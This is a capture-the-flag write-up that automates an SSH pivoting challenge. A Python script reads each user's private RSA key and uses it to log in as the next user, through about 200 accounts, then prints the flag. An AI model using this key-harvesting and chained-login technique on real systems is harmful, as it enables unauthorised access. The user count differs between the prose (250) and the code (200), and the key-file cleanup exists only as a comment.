Every user can read the private rsa key of the next user. You just have to grab it, and ssh as the next. But... there are 250 ?!?
Let's automate it ! (The last user has a flag.txt at the root of his home directory)
The base credentials are:
Host :
Port : xxxx
Format : Hero{flag}
Author : Log_s
This script solves the challenge. One mistake to not make here, is to chain the SSH sessions all together. The result would be a very slow response time (I mean VERY slow). So you'll notice every remote ssh connection is made from the gateway session (user1) that is available from the outside.
from jumpssh import SSHSession
from os import remove
host = ''
port = 22
#Connect to machine
print("[*] Connect to gateway ssh account\n")
gateway = SSHSession(host, "user1", port=22, password="user1")
# Keep track of sessions
active_session = gateway
for i in range(2, 201):
# Read Key
key = active_session.get_cmd_output("./getSSHKey") # 4096 -> key size ; 36*2 -> header+footer size
# Write Key
open("key.tmp", "w").write(key)
# Get next session and save it
active_session = gateway.get_remote_session("", username=f"user{i}", private_key_file="key.tmp")
if i%50==0:
print(f"[*] User {i}/200")
# Remove temporary file
# Read and print flag
print("\n[+] Flag : ", active_session.get_cmd_output("cat flag.txt"))
For a simple ssh connections, I recommend using pwntools, that offers a few very usefull services. But it sadly doesn't allow chaining ssh sessions (for pivoting for exemple). You'll have to use other libraries (like here jumpssh, that is a kind of wrapper for Paramiko), sockets, or setup port forwarding.